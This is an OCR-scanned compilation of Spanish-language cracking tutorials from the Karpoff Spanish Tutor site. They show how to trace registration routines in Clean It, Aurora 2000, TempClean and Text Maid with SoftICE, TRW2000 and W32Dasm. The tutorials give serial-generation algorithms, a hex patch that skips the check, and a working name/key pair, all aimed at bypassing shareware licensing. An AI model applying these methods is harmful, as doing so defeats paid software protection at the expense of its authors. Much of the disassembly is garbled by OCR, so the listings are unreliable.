:0040A553 743E je 0040A593 <= Vamos aqui... 


:0040A593 8B5C2420 mov ebx, dword ptr [esp+20] <= Aqui caemos 

:0040A597 8B 742424 mov esi, dword ptr [esp+24] 

:0040A59B 8B4C2418 mov ecx, dword ptr [esp+18] 

:D0040A59F 6A0O push 00000000 

:0040A5A1 53 push ebx 

:0040A5A2 56 push esi 

:0040A5A3 E888000000 call 00404630 <= Se genera la 1ra parte en HEX 

:0040A5A8 3BC7 cmp eax, edi <= Forzamos a EDI a comparar igual y anotamos el valor de EAX 

:0040ASAA 740C je 0O40A5B8 <= Vamos a 0040A5B8 

:0040ASAC 8B442414 mov eax, dword ptr [esp+14] 

:0040A5BO SF pop edi 

:0040A5B 1 SE pop esi 

:0040A5B2 5D pop ebp 

:0040A5B3 5B pop ebx 

:0040A5B4 83C418 add esp, 00000018 

:0040A5B7 C3 ret 

:0040A5B8 8B4C2418 mov ecx, dword ptr [esp+18] <= Aqui caemos... 

:0040A5BC 6A01 push 00000001 

:0040A5BE 53 push ebx 

:0040A5BF 56 push esi 

:0040A5C0 E86B000000 call 00404630 <= Se genera la 2da parte en HEX 

:0040A5C5 3BC5 cmp eax, ebpp <= Forzamos a EBP a comparar igual y anotamos el valor de EAX 

:0040A5C7 740C je 0040A5D5S <= Vamos a 0040A5D5 

:0040A5C9 8B442414 mov eax, dword ptr [esp+14] 

:0040A5CD 5F pop edi 

:0040A5CE SE pop esi 

:0040A5CF 5D pop ebp 

:0040A5DO0 5B pop ebx 

:0040A5D1 83C418 add esp, 00000018 

:0040A5D4 C3 ret 

:0040A5D5 3B5C2410 cmp ebx, dword ptr [esp+10] <= Compara que EBX sea igual a un byte en 

ESP+10 y lo anotamos 

:0040A5D9 740C je 0O040A5E7  <=Si es igual genera un número para comparar afuera y lo guarda 

en EAX 


:0040A5DB 8B442414 mov eax, dword ptr [esp+14] 
:0040A5DF S5F pop edi 

:0040A5EO0 SE pop esi 

:0040A5E1 5D pop ebp 

:0040A5E2 5B pop ebx 

:0040A5E3 83C418 add esp, 00000018 

:0040A5E6 C3 ret <= Sale y va a comparar 


Ahora tendremos nuestro serial escrito en nuestras notas, unamóslo todo y veamos que pasa, nos ha dado nuestro 
mensajito de Registration failed!, debemos recordar como llegamos a conseguir estos datos y fué por medio de 2D 
veamos que representa 2D en ASCII, al ver vemos que 2D en DEC es 45 y en ASCII representa al signo - o guión, 
entonces lo que se me ocurre es que separemos estos por medio de guiones el cual quedaría así... 


CLN-00000000-00000000-0 
Ahora presionamos Register y vemos... en mi caso 
"Thank you ByTESCRK for registering my program Clean It and for helping to support shareware." 


Este autor utiliza el mismo método de comparación para todos sus programas, lo único que deben tomar en cuenta son 
los primeros tres caracteres que varian para Clean It es CLN, Part It es PRT, Find It es FND, etc. 


Si no quieres irte forzando los valores AL y llegar hasta donde se generan los códigos, cambia con un editor 
hexadecimal en 0040A48B, escribe esto E903010000 y NOPea el resto, ¿qué cómo calculas los offset?, consiguete un 
programa de OPCodes, si quieres el que yo uso, enviame un email. 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor X, CaoS ReptantE y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


Audora Scrren saver 


Serial 


Registrar con un serial valido 


Este es un screen saver.. hay varios en esa pagina .. TODOS SON IGUALES.. Lo que cambia es 
el numero contra el que ejecuta el XOR 


Novato 


http://www.coolscreens.com/aurora2000.exe 


Softice W32dsm89 Editor Hex.. 
SiLvEr StOrM FECHA: 18/11/2001 


INTRODUCCION 


Hola de nuevo, despues de varios meses sin hacer un tute aqui les va otro ..aqui vamos de nuevo pero esta vez 
a sacar el serial y ademas vamos a ver como genera este serial . espero que lo entiendan y les sea util. 


Recuerden que este tutorial esta hecho con fines netamente educativos si les interesa este Programa 


COMPREANLO. 


Aprovecho la oportunidad para condenar los actos terroristas ocurridos en E.Ú. así como para decirles 
a todas las personas que leen estos tutes, que sigamos unidos por vencer a la ignorancia, que no 
caigamos en los mismos errores de los demas, que unidos y todos con un mismo fin estaremos en la 
cuspide.. todos adelante.. seguimos aqui.. 


AL ATAKE 


Lo primero que hacemos es instalarlo... Luego dejan que se active el screen saver.. o le dan a TEST.. cuando se 
actica y se mueve el mouse nos sale la pantallita para registrarnos,, aqui es donde entramos nosotros. 


Ok... jeje aqui comienza la aventura. 
Ponemos un nombre y un serial cualquiera. por ejemplo:123456789 presionamos Cntrol+D i sice Salta 
ponemos un bpx hmemcpy (este bpx es casi universal :)) Salimos de sice con CONTROL + D. 


Le damos Ok. a la pantalla del serial y sice SALTA.. jeje que genial es hmemcpy... es mas dejenme decirles que 
en este screen saver si ponemos bpx dentro del programa cuando el programa abre asi pase por ese punto sice 
no salta.. solo le para a hmemcpy y luego que entra con ese si entra a los demas que pusimos... 


Desabilitamos los break points bd* 


F12 varias veces hasta que caigamos en nuestro codigo de aurora... que como lo sabemos por que en una linea 
verde del sice nos aparece ese nombre aurora en una de las ventanitas :-). 


Empezamos a tracear con £10 hasta que llegamos a la adireccion 4550b3 *esta call apunta a un api de windows.. 
SLEEP... esto es para detener el proceso por un rato....es como un spera un momento y continua. 


Sigue presionando f10 


* Reference To: kernel32.Sleep, Ord: 0000h 
l 


:004550B3 ESG6COFFEBFF Call 00406024 

:004550B8 8D55F8 lea edx, dword ptr [ebp-08] 
:004550BB S8B83E38020000 mov eax, dword ptr [ebx+00000ZE8S] 
:004550C1 ES2636FDFF call 004286EC 

:004550C6 8B45F8 mov eax, dword ptr [ebp-08] 
:D004550C9 50 push eax 

:004550CA 8D55F4 lea edx, dword ptr [ebp-0C] 
:004550CD 8B3S3E4020000 mov eax, dword ptr [ebx+000002ZE4] 
:004550D3 ES1436FDFF call 004286EC 

:004550D8 8B45F4 mov eax, dword ptr [ebp-0C] 
:004550DB 5A pop edx Call sospechoso 
:004550DC ES973SFFFF call 00448978 


entramos aqui con f8 


* Referenced by a (Ujnconditional or (C)jonditional Jump at Addresses: 
1:004550981/C), :004550AC(C) 
| 


:004550El A1FC7?C4500 mov eax, dword ptr [00457CFC] 
:004550E6 803800 cmp byte ptr [eax], 00 
:004550E9 0OFS515010000 jne 00455204 

:D04550EF 6880524500 push 00455280 


ENTRAMOS EN ESE CALL... con FS 


De aqui en edelante observen bien cada una de las instrucciones. 


EiX=D06FES575 EBX=0"75BCD15 ECXx=00000001 EDX=00 CAS ESI=D006FE1A24 


EDI=D006FE124 EBP=006FES57C ESP=006FES55 EIP=004489D”7 odiIlsza 


D3=02 47 E 21 S=6127 G5=0000 


023F:004489D2 CALL 00403140 ES 
(023F:004489D7 CMP_ DWORD PTR [EBP-0c],00 | en el otro regisito el codigo que metimos 
023F:004489DB  JNZ 002248923 ' ] y tambien valida que no venga vacio ni el 
23F:004489DD CMP DWORD PTR [EBP-04],00 "x nombre nielcodigo : rror y no 
3F:004459E1l  —JNZ 004459EC 
D23F:004459E3 MO BYTE PTR [004579F8] ,01—4— 
:0049459E4  —JMP 00445154 
DO23F:004459EC MOV , [EBP-04] 
:004489EF CALL 00403C2 
:004459F4 
:004459F6 
:004459F5 


ne nuestro 


:004489FA Pone en EX el 
-004489FF MOV ECX, 00010000 ——— Pone enE 0000 [HE ) [decimal] 
:00448404 SUB ECX,EAX > resta a ECX lo que tenga E4X-- aqui 10000 - 1=FFFF 
-00448406 MOV ESI, [EBP-04] ————- Mueve aESI lo que lleva EBP-04....Nuestro Nombre 


ESI,BYTE PTR [EAX+ESI-01] 


Hasta aqui creo que bamos claros.... espero.. creo.. digo.. :-) 


O23F:004451409 MOVZX ESI,BYTE PTR [El2Xx+ES1I1-01] 
O23F:00494540E —IMUL ECX,ESI 
O23F:00445411 ADD [004579FC] ,ECX 


En la direccion 00448A09 Saca de nuestro nombre el siguiente caracter. Y le aplica un IMUL a ese carcater que 
saco y deja el valor resultante en ECX, luego suma (ADD) en la direccion (004579FC) lo que tenemos en ECX ... 
NOTA AQUI ESTA GENERANDO EL NUMERO CONTRA EL CUAL MAS ADELANTE HACE EL XOR 
PARA GENERAR LA CLAVE. 


O23F:00445117”7 INC EAX 
023F:0044581185 DEC EDX 


O23F:004458119 JNZ 009459FF 


Incrementa EAX y Decremeta EDX y regresa para seguir calculando cada uno de los carcateres de nuestro 
nombre .. osea se repite el loop desde 004489ff hasta que EAX valga el total de caracteres de nuestro nombre y 
EDX valga 0.. AQUI GENERO EN la posicion de memoria 004579FC .. EL NUMERO QUE LES MENCIONE. 


Aqui est la parte interesante :) 


023F:00448A41B MOV 
O23F:0044581420 XOR 


E2AX, [00457400] 
[004579FC] ,EAX 


En 448A1B. Pone en EAX Lo que trae en la direccion [00457A00] ah.. si... cierto... que como se que cuanto trae 
ahi... bueno si miran en sice cuando estamos parados sobre la linea en la parte de arriba veran ese registro 
cuanto trae en hexadecimal. AHH. Este valor que trae es fijo nunca cambia (aqui es donde cambia para cada 
uno de los programas que esta casa hace). 


GS=0000 
ESI,BYTE PTR [EAX+ESI-01] 
ECX,ESI qe 
[0094579FC] ,ECX AQUÍ YEMOS QUE 0045400 ES IGUAL 4 0D5403D5 EN 
-00448417 INC FAX L... RECUERDEN QUE ESTE N O 
:00448 j DEC EDX 
023F:00448419  JNZ 004489FF 
023F:00445811B MOV EAX, [00457100] 
023F:00448420 XOR [004579FC] ,EAX 


EBX=07?5BCD15 ECX=004CFC64 
EBP=006FES7C ESP=D006FES55 EIP=00445120 
F35=6127 G5=D000 (Ds :00457 


ESI,BYTE PTR asi 


IMUL ECX,ESI 
:004 ADD [004579FC] ,ECX OMO LES DE 
:004 ? INC EAX JE EA IN LO QUE TIENE EN 
-004 8 DEC EDX 004579FC] Y RESULTADO LO 
:004 9 JNZ 004489FF 

MOV EAX, [00457400] 

[004579FC] ,EAX 

:00448126 DWORD PTR [(004579FC],0145C52E 
:00448430 0044843C 
:004 32 DWORD PTR [004579FC],D145C52E 
:004 E EBX, [004579FC] 
:00448142 0044814D 
:00448144 BYTE PTR [004579F8],00 
:00445149B 004458154 
:0044814D BYTE PTR [004579F8],01 


Ok lo que les decia anoten el numero que les aparece arriba en HEXADECIMAL y lo llevam a DECIMAL... 
pues ese es nuestro NUMERO MAGICO... tambien puede en sice poner ? y el numero y sice se lo combierte a 
decimal. 


Por ejemplo ?56FAA24 y saldra 91204132. 

RECUERDEN VER EL NUMERO DESPUES DE APRETAR F10 SOBRE EL XOR.. ese es el correcto. 

En la 448a26 compra que el numero que nos dio sea mayor que 0145C52E (21349678) si es menor no salta y le 
suma al numero que nos dio ese valor osea le suma al numero que genero en decimal + 21349678.. tengan en 
cuenta las comberciones en decimal y hexadecimal .. y ese serial el codigo secreto.. Si es mayor que esa cantidad 


entonces salta y nos deja esa cantidad como nuestro serial. 


Esta condicion se cumpliria si pusieramos un nombre de 1 letra o algo asi... por lo tanto al poner nuestro 
nombre deberia pasar sin hacer esta suma. 


Luego en 448A42.. aqui hace la comparacion.. en EBX tenemos lo que pusimos como serial falso ? EBX y 
veremos lo que pusimos y en [004579FC] tenemos el serial verdadero... .. sin son iguales no salta y pone en en el 
primer byte de [004579f8] el valor de 00 y el programa quedaria registrado .. si son diferentes pone 01 y el 
programa no se registra... 


Bueno amigos.. por cierto.. el programa graba en el directorio Windows en el Archivo control.ini el usuario y la 
clave si lo borran.. OJO no borren el archivo... Solo la linea donde esta el registro del screen saver... podran 
comenzar de nuevo.. 


Aurora 2000 


Congratulations! 

Thank you for purchasing £urora 2000. 

Please save your personal registration information. 

Name: SiLwEr StOrkd 

Key Code: 138111473 

If pou upgrade your system or get a new hard drive, 

you may need to reinstall and enter the above information. 


jeje :-) Programa crackeado.. y nuestro conocimiento apmpliado y actualizado.. espero que les quede claro. 


nO0TAS 


Cualquier error por favor pido disculpas, y si lo ven por favor me lo dicen, para corregirlo.. recuerden que soy 
humano y por lo tanto no soy perfecto.. (:-)) y no quiero serlo tampoco... 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor X 

Tahkahozangel.. (Buen programado de ASM - Thanks Friend) 

Mr. Silver(Black Fennix). 

KuaTo 

Vlugo, Caos Raptante.. Etc.. y a todos .. no camben en esta lista... son muchos.. 
GRACIAS A TODOS.. 


+ Toda la gente de TUTORIALES2000-GT2-TNT-ECC-TRIAD. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Chotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 
TempClean v3.04 


Name / Serial, Limitación de Tiempo 
Hacer un Keygen 

Ver introducción 

Novato. 


http://alvilim.virtualave.net 


TRW2000, W32dasm 


ByTESCRK FECHA: 02/10/2001 


INTRODUCCION 


En Windows 9x/N'T muchos programas usan archivos temporalmente los cuales se quedan muchas veces 
después de usar el programa. Es por esto que el espacio en el disco duro decrece y el sistema empieza a dar 
problemas de rendimiento y comunmente disminuye o su sistema puede colgarse de vez en cuando por falta 
de espacio para el swapfile. 


TempClean limpia los directorios temporales o busca por estos archivos en su disco duro, usted no necesita 
pensar que puede enviar a su papelera de reciclaje. Puede personalizar fácilmente WINDOWS/TEMP, Caché 
de Internet, Historial de Mis Documentos o cualquier otro directorio que quiera que TempClean limpie, 
tambien puede personalizarlo para que lo haga al iniciar Windows usted no necesitará estar recordando. 


AL ATAKE 


Primeramente lo que haremos es analizar el terreno, si ya tenemos instalado el programa nos vamos a cargarlo, nos 
damos cuenta que al cargarlo aparece en una ventana principal y tenemos un botón de "Register", hacemos clic en él y 
automáticamente nos aparece otra ventanita en dónde nos pide un Registration name y un Registration key, ingresamos 
uno cualquiera en mi caso 


Registration name = ByTESCRK 
Registration key = 12345 


Y nos dice "Invalid registration key!" Abrimos el W32DASM y buscamos en las Reference Strings esa frase, al 
encontrarla y hacer doble clic en ella vemos esto... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:005636C3(C) 


:005636E6 8D55F8 lea edx, dword ptr [ebp-08] 

:005636E9 8B83DC020000 mov eax, dword ptr [ebx+000002DC] 
:005636EF E86089FCFF call 0052C054 

:005636F4 8B4DF8 mov ecx, dword ptr [ebp-08] 

:005636F7 8B55FC mov edx, dword ptr [ebp-04] 

:005636FA 8BC3 mov eax, ebx 

:005636FC E8F3000000 call 005637F4 <= Entramos aqui 
:00563701 84CO0 test al, al 

:00563703 7419 je 0056371E 

:00563705 8B4DF8 mov ecx, dword ptr [ebp-08] 

:00563708 8B55FC mov edx, dword ptr [ebp-04] 

:0056370B 8BC3 mov eax, ebx 

:0056370D E826020000 call 00563938 

:00563712 C7833402000001000000 mov dword ptr [ebx+00000234], 00000001 
:0056371C EBI1F jmp 0056373D 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00563703(C) 


:0056371E 6A00 push 00000000 
:00563720 668B0D7C375600 mov cx, word ptr [0056377C] 
:00563727 B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Invalid registration key!" 


:00563729 B8D8375600 mov eax, 005637D8 <= Aqui caemos, investigamos hacia arriba 
:0056372E E815B3FEFF call 0054EA48 
:00563733 C7833402000002000000 mov dword ptr [ebx+00000234], 00000002 


Abrimos el TRW2000 y vamos a cargar el programa, este nos da brinca al momento de cargar el programa, ponemos 
un punto de ruptura en 005636FC, luego con F8 entramos a la call y caemos aquí... 


* Referenced by a CALL at Addresses: 
|:0056110E , :005636FC <= Podemos ver que viene de dos lugares 


:005637F4 55 push ebp 

:005637F5 8BEC mov ebp, esp 

:005637F7 51 push ecx 

:005637F8 B904000000 mov ecx, 00000004 
:005637FD 6A00 push 00000000 
:005637FF 6A00 push 00000000 

:00563801 49 dec ecx 

:00563802 75F9 ¡ne 005637FD 

:00563804 874DFC xchg dword ptr [ebp-04], ecx <= Recibe nuestro serial malo 
:00563807 53 push ebx 

:00563808 56 push esi 


:00563809 894DF8 mov dword ptr [ebp-08], ecx 

:0056380C 8955FC mov dword ptr [ebp-04], edx 

:0056380F 8B45FC mov eax, dword ptr [ebp-04] 

:00563812 ESFSO6FAFF call 00503FOC 

:00563817 8B45F8 mov eax, dword ptr [ebp-08] 

:0056381A ESEDOG6FAFF call 00503F0C 

:0056381F 33C0 xor eax, eax 

:00563821 55 push ebp 

:00563822 681D395600 push 0056391D 

:00563827 64FF30 push dword ptr fs:[eax] 

:0056382A 648920 mov dword ptr fs:[eax], esp 

:0056382D 33DB xor ebx, ebx 

:0056382F 8B45FC mov eax, dword ptr [ebp-04] 

:00563832 E82105FAFF call 00503D58 

:00563837 8B FO mov esi, eax 

:00563839 8B45F8 mov eax, dword ptr [ebp-08] 

:0056383C E81705FAFF call 00503D58 

:00563841 83F80A cmp eax, 0000000A <= Compara nuestro serial igual a 10 
:00563844 0F85B6000000 jne 00563900 

:0056384A 8BC6 mov eax, esi 

:0056384C 85C0 test eax, eax 

:0056384E 7E13 jle 00563863 

:00563850 BA01000000 mov edx, 00000001 

:00563855 8B4DFC mov ecx, dword ptr [ebp-04] <= Nuestro nombre 
:00563858 0FB64C11FF movzx ecx, byte ptr [ecx+edx-01] <= Extrae caracter por caracter 
:0056385D 03D9 add ebx, ecx <= Agregar el valor decimal a EBX 

:0056385F 42 inc edx <= Incrementa EDX en 1 

:00563860 48 dec eax <= Decrece EAX en 1 

:00563861 75F2 ¡ne 00563855 <= Ciclo hasta que termine el nombre 
:00563863 69C3C06A 1200 imul eax, ebx, 0O126ACO0  <=EAX = EBX * 00126AC0 
:00563869 8BD8 mov ebx, eax 

:0056386B 8D45FO0 lea eax, dword ptr [ebp-10] 

:0056386E 50 push eax 

:0056386F 8D55EC lea edx, dword ptr [ebp-14] 

:00563872 8BC3 mov eax, ebx 

:00563874 ESD74AFAFF call 00508350 

:00563879 8B45EC mov eax, dword ptr [ebp-14] <= Muestra el Decimal del pre-serial 
:0056387C B903000000 mov ecx, 00000003 

:00563881 BA01000000 mov edx, 00000001 

:00563886 ESDSO06FAFF call 00503F60 <= Extrae los primeros tres caracteres 
:0056388B FF75FO push [ebp-10] 

:0056388E 8D45E4 lea eax, dword ptr [ebp-1C] 

:00563891 8B55FC mov edx, dword ptr [ebp-04] 

:00563894 8A12 mov dl, byte ptr [edx] 

:00563896 ESESO3FAFF call 00503C80 

:0056389B 8B45E4 mov eax, dword ptr [ebp-1C] 

:0056389E 8D55E8 lea edx, dword ptr [ebp-18] 

:005638A1 E80648FAFF call OOSOSOAC <= Vamos a entrar aqui 


Analizando la llamada que se hace arriba podemos notar que el programa compara la 
primera letra y dependiendo de su valor decimal lo acondiciona para que sea mayúscula 


:005080AC 53 push ebx 

:005080AD 56 push esi 

:005080AE 57 push edi 

:005080AF 8BFA mov edi, edx 
:005080B 1 8BFO mov esi, eax 
:005080B3 8BC6 mov eax, esi 
:005080B5 ES9EBCFFFF call 00503D58 


:005080BA 8BD8 mov ebx, eax 

:005080BC 8BC7 mov eax, edi 

:005080BE 8BD3 mov edx, ebx 

:005080C0 E87FBFFFFF call 00504044 

:005080C5 8BD6 mov edx, esi 

:005080C7 8B37 mov esi, dword ptr [edi] 

:005080C9 85DB test ebx, ebx 

:005080CB 7415 je 0OSO080E2 

:005080CD 8A02 mov al, byte ptr [edx] <= Extrae el primer caracter 
:005080CF 3C61 cmp al, 61 <= Compara que no sea minúsculas 
:005080D1 7206 ¡b 0OS080D9 —<=Si no es minúscula brinca 
:005080D3 3C7A cmp al, 7A <= Compara si es minúscula 
:005080D5 7702 ja 005080D9 — <=8Si es otro caracter brinca y da el mensaje chico-malo 
:005080D7 2C20 sub al, 20 <= Si es minúscula la cambia a mayúscula 
:005080D9 8806 mov byte ptr [esi], al 

:005080DB 42 inc edx 

:005080DC 46 inc esi 

:005080DD 4B dec ebx 

:005080DE 85DB test ebx, ebx 

:005080E0 75EB jne 005080CD 

:005080E2 5F pop edi 

:005080E3 5E pop esi 

:005080E4 5B pop ebx 

:005080E5 C3 ret <= Regresamos a 005638A6 


Regresamos a seguir analizando la manera en que se genera nuestro serial 


:005638A6 FF75E8 push [ebp-18] 

:005638A9 8D45EO0 lea eax, dword ptr [ebp-20] 

:005638AC 50 push eax 

:005638AD 8D55DC lea edx, dword ptr [ebp-24] 

:005638B0 8BC3 mov eax, ebx 

:005638B2 E8994AFAFF call 00508350 

:005638B7 8B45DC mov eax, dword ptr [ebp-24] <= Recibe el pre-serial 
:005638BA B903000000 mov ecx, 00000003 

:005638BF BA04000000 mov edx, 00000004 

:005638C4 EsS9706FAFF call 00503F60 <= Extrae los otros tres caracteres 
:005638C9 FF75EO0 push [ebp-20] 

:005638CC 8D45F4 lea eax, dword ptr [ebp-0C] 

:005638CF BA03000000 mov edx, 00000003 

:005638D4 EsS3FOSFAFF call 00503E18 <= Une los primeros + la letra + los otros caracteres 
:005638D9 8D45F4 lea eax, dword ptr [ebp-0C] 

:005638DC 8B4DF4 mov ecx, dword ptr [ebp-0C] 


* Possible StringData Ref from Code Obj ->"TC3" 


| 

:005638DF BA34395600 mov edx, 00563934 <= Obtiene una variable predefinida por el autor 
:005638E4 E8BBO04FAFF call 00503DA4 <= Une todo transformándolo en TC3??????? 
:005638E9 8B55F4 mov edx, dword ptr [ebp-0C] 

:005638EC 8B45F8 mov eax, dword ptr [ebp-08] <= Podemos ver el serial correcto en EDX 
:005638EF E83048FAFF call 00508124 <= Compara las primeras letras 

:005638F4 85CO0 test eax, eax 

:005638F6 7504 jne 005638FC  <=5SIi no son iguales da el mensaje chico-malo 

:005638F8 B301 mov bl, 01 

:005638FA EBO06 jmp 00563902  <=Si son iguales continua revisando el resto 

:005638FC 33DB xor ebx, ebx 


:00563917 ESEOO1FAFF call 005S03AFC 
:0056391C C3 ret <= Retornamos a dar el mensaje de chico-malo 


Es bastante notable el hecho de que en las Reference String del W32DASM podamos ver un string 
con "Illegal registration name!" y lo siguiente lo vemos aquí... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0056363C(C) 


:005636AB 8B83D8020000 mov eax, dword ptr [ebx+000002D8] 
:005636B1 E89E89FCFF call 0052C054 
:005636B6 8B45FC mov eax, dword ptr [ebp-04] 


* Possible StringData Ref from Code Obj ->"CoKeBoTtLe99" <= :0) Sin comentarios 


:005636B9 BA6C375600 mov edx, 0056376C 

:005636BE E8SASO7FAFF call 00503E68 

:005636C3 7521 jne 005636E6 

:005636C5 6A00 push 00000000 

:005636C7 668B0D7C375600 mov cx, word ptr [0056377C] 
:005636CE B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Illegal registration name!" 


:005636D0 B888375600 mov eax, 00563788 

:005636D5 ES6EB3FEFF call 0054EA48 

:005636DA C7833402000002000000 mov dword ptr [ebx+00000234], 00000002 
:005636E4 EB57 ¡mp 0056373D 


Creo que ahora ya puedo formar parte en la lista negra de este autor... ;0) 


Hay un momento en el que yo dejé de seguir traceando pues el programa me saco y me dijo que mi serial no era 
correcto y si se pueden dar cuenta fué al momento de comparar la longitud del serial malo. 


Cómo siempre recordarles que "'Si les gusta el programa paguen por él'' No me hago responsable por el mal uso de 
este tutorial, el fin principal es "Aprender Más". 


Saludos a Karpoff, Profesor_X y a mi buen amigo CaoS ReptantE, por su paciencia para conmigo. Gracias 
nuevamente a tí por haber llegado hasta esta línea. 
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INTRODUCCION 


Debido a la falta de honradez de algunos programadores he desistido en crear este tutorial, por ejemplo, he 
puesto este programa y ustedes al final sacarán sus conclusiones si realmente vale su precio o no, ($14.00) 
por un programa que únicamente lo que hace es extraer unos cuantos caracteres del texto de un correo 
electrónico, bueno, no lo tomen tan apecho este es tan solo mi punto de vista, si ha algunos ofendo disculpen 
pero no entiendo por qué cobrar por una utilería que debiera de ser gratuita. 


Como al principio de colado nos llevaremos el programa My Scribe dentro de nuestros pies... ¡oD 


AL ATAKE 


Antes que nada descargarnos nuestra victima desde su gieb, si ya está, lo instalamos y lo inspeccionamos, nos vamos 
como siempre al Help > About Text Maid... y vemos nuestro querido amigo de siempre... el cuadro de registro de 
nuestra victima... 


Registered to: Unlicensed 
License key: 


Ok ahora ingresamos en el primero nuestro nombre, en mi caso ByTESCRK y de licencia 19772404 (:0D gracias CaoS 
por tu consejo), ahora clic en OK y salta el error... 


Invalid license key for specified email address 


Bueno ahora ya sabemos que es una dirección de correo, clic en Aceptar y colocamos nuestra direccón de correo, en 
mi caso ByTESCRKGiespana.es 


Vamos a desensamblar a nuestra victima y buscamos en las Reference Strings nuestros valores y vemos que caemos 
aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004015E2(C) 


:0040163B 6A00 push 00000000 
:0040163D 6A30 push 00000030 


* Possible StringData Ref from Data Obj ->"Invalid license key for specified " 
->"email address." 


:0040163F 68C8104100 push 004110C8 <= Aqui caemos 
Vamos con Goto Code Location al punto 004015E2 y vemos que caemos en... 


:004015D5 51 push ecx 

:004015D6 52 push edx 

:004015D7 8D4C2414 lea ecx, dword ptr [esp+14] 

:004015DB E810310000 call 004046F0 <= Aqui vamos a investigar 
:004015E0 85C0 test eax, eax 

:004015E2 7457 je 0040163B_ <= De aqui va al mensaje de error 
:004015E4 8D442404 lea eax, dword ptr [esp+04] 

:004015E8 8D4C2408 lea ecx, dword ptr [esp+08] 

:004015EC 50 push eax 


Vamos a cargar ahora el TRW2000, buscamos nuestra victima y le damos clic a Load y ponemos un punto de ruptura 
en 004015DB (Oj cuando estemos traceando veamos que sea en el archivo textmaid.exe) y al hacer clic en el botón 
OK para registrar (ya que hemos ingresado nuevamente los datos), vemos que caemos en la llamada a 004046F0 y 
entramos con ES... luego seguimos traceando con F10 


:004046F0 8B542404 mov edx, dword ptr [esp+04] 
:004046F4 8D4110 lea eax, dword ptr [ecx+10] 
:004046F7 56 push esi 

:004046F8 50 push eax 

:004046F9 8D44240C lea eax, dword ptr [esp+0C] 
:004046FD 52 push edx 

:004046FE 50 push eax 

:004046FF ES7CD2FFFF call 00401980 <= Entramos aqui... 
:00404704 8B4C240C mov ecx, dword ptr [esp+0C] 
:00404708 8B00 mov eax, dword ptr [eax] 
:0040470A 8B09 mov ecx, dword ptr [ecx] 
:0040470C 51 push ecx 


:0040470D 50 push eax 

:0040470E FF15F0C74000 Call dword ptr [0040C7FO] <= Aqui se compara el serial malo y el bueno 
:00404714 83C408 add esp, 00000008 

:00404717 8D4C2408 lea ecx, dword ptr [esp+08] 

:0040471B 85CO0 test eax, eax 

:0040471D 0F94C2 sete dl 

:00404720 81E2FF000000 and edx, 0OOOO0OFF 

:00404726 8BF2 mov esi, edx 


Al entrar en 00401980 vemos esto... 


:00401980 6AFF push FFFFFFFF 

:00401982 680FA24000 push 0040A20F 

:00401987 64A 100000000 mov eax, dword ptr fs:[00000000] 

:0040198D 50 push eax 

:0040198E 64892500000000 mov dword ptr fs:[00000000], esp 

:00401995 51 push ecx 

:00401996 8B44241C mov eax, dword ptr [esp+1C] 

:0040199A 55 push ebp 

:0040199B 56 push esi 

:0040199C 57 push edi 

:0040199D 8B30 mov esi, dword ptr [eax] 

:0040199F 33C9 xor ecx, ecx 

:004019A1 33C0 xor eax, eax 

:004019A3 C744240C00000000 mov [esp+0C], 00000000 

:004019AB 8B7EF8 mov edi, dword ptr [esi-08] 

:004019AE 85FF test edi, edi 

:004019B0 7E13 jle 004019C5 

:004019B2 OFBE1406 movsx edx, byte ptr [esi+eax] <= Extrae letra por letra de una palabra clave 
:004019B6 8BEA mov ebp, edx <= Mueve el valor en DEC a ebp 

:004019B8 C1E5OS shl ebp, 05 <= Multiplica el valor en DEC por 2, cinco veces 
:004019BB 03E9 add ebp, ecx <= Suma EBP + ECX 

:004019BD 40 inc eax <= Incrementa EAX en uno 

:004019BE 3BC7 cmp eax, edi <= EDI = Longitud de la palabra clave 
:004019C0 8DOC2A lea ecx, dword ptr [edx+ebp]  <=ECX = EDX + EBP 
:004019C3 7CED jl 004019B2 <= Si no es menor regresa a 004019B2 
:004019C5 8B542424 mov edx, dword ptr [esp+24] 

:004019C9 33FF xor edi, edi 

:004019CB 33C0 xor eax, eax 

:004019CD 8B12 mov edx, dword ptr [edx] <= Nuestro email 

:004019CF 8B72F8 mov esi, dword ptr [edx-08] <= Longitud del email 
:004019D2 85F6 test esi, esi 

:004019D4 7E0E jle 004019E4 

:004019D6 OFBE2C02 movsx ebp, byte ptr [edx+eax] <= Extrae letra por letra del email 
:004019DA OFAFE9 imul ebp, ecx <= El valor en DEC de la letra por el resultado anterior 
:004019DD 03FD add edi, ebpp <= Acumula en EDI 

:004019DF 40 inc eax <= Incrementa EAX en uno 

:004019E0 3BC6 cmp eax, esi <= Compara EAX y ESI 

:004019E2 7CF2 j1 004019D6  <=Si no coinciden regresa a finalizar el proceso 
:004019E4 8D4C2428 lea ecx, dword ptr [esp+28] <= Aqui está nuestro serial válido en HEX 
:004019E8 E8F77A0000 Call 004094E4 

:004019ED 57 push edi 

:004019EE 8D44242C lea eax, dword ptr [esp+2C] 

:004019F2 BD01000000 mov ebp, 00000001 


